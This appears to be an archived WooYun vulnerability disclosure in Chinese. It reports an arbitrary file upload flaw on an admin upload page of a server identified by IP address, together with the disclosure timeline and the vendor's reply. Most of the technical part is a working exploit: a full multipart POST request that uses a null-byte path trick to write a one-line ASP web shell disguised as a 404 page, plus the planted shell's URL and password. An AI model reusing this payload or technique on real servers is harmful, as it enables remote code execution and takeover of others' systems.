乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-15: 细节已通知厂商并且等待厂商处理中 2015-10-15: 厂商已经确认,细节仅向厂商公开 2015-10-25: 细节向核心白帽子及相关领域专家公开 2015-11-04: 细节向普通白帽子公开 2015-11-14: 细节向实习白帽子公开 2015-11-29: 细节向公众公开
任意文件上传
http://58.60.191.91:88/
扫描器扫描之得到一个上传页面
http://58.60.191.91:88/Admin/Upload.asp
上传后抓包改包,修改filepath
POST http://58.60.191.91:88/Admin/hygfile.asp HTTP/1.1Host: 58.60.191.91:88Connection: keep-aliveContent-Length: 739Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://58.60.191.91:88User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqsmdFRXZ4oUnQRtzReferer: http://58.60.191.91:88/Admin/Upload.aspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASPSESSIONIDAACQAQTS=AIADMEHDINFAGGIFNACLICMC------WebKitFormBoundaryqsmdFRXZ4oUnQRtzContent-Disposition: form-data; name="filepath"../test.asp%00 这里记得把%00url-decode一下------WebKitFormBoundaryqsmdFRXZ4oUnQRtzContent-Disposition: form-data; name="act"upload------WebKitFormBoundaryqsmdFRXZ4oUnQRtzContent-Disposition: form-data; name="file1"; filename="01.jpg"Content-Type: image/jpeg<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html><%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%>------WebKitFormBoundaryqsmdFRXZ4oUnQRtzContent-Disposition: form-data; name="Submit" ô ------WebKitFormBoundaryqsmdFRXZ4oUnQRtz--
上传后的一句话文件路径为http://58.60.191.91:88/test.asp密码1
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-10-15 11:36
谢谢,旧系统,只拿来查询历史数据所用。马上处理故障
暂无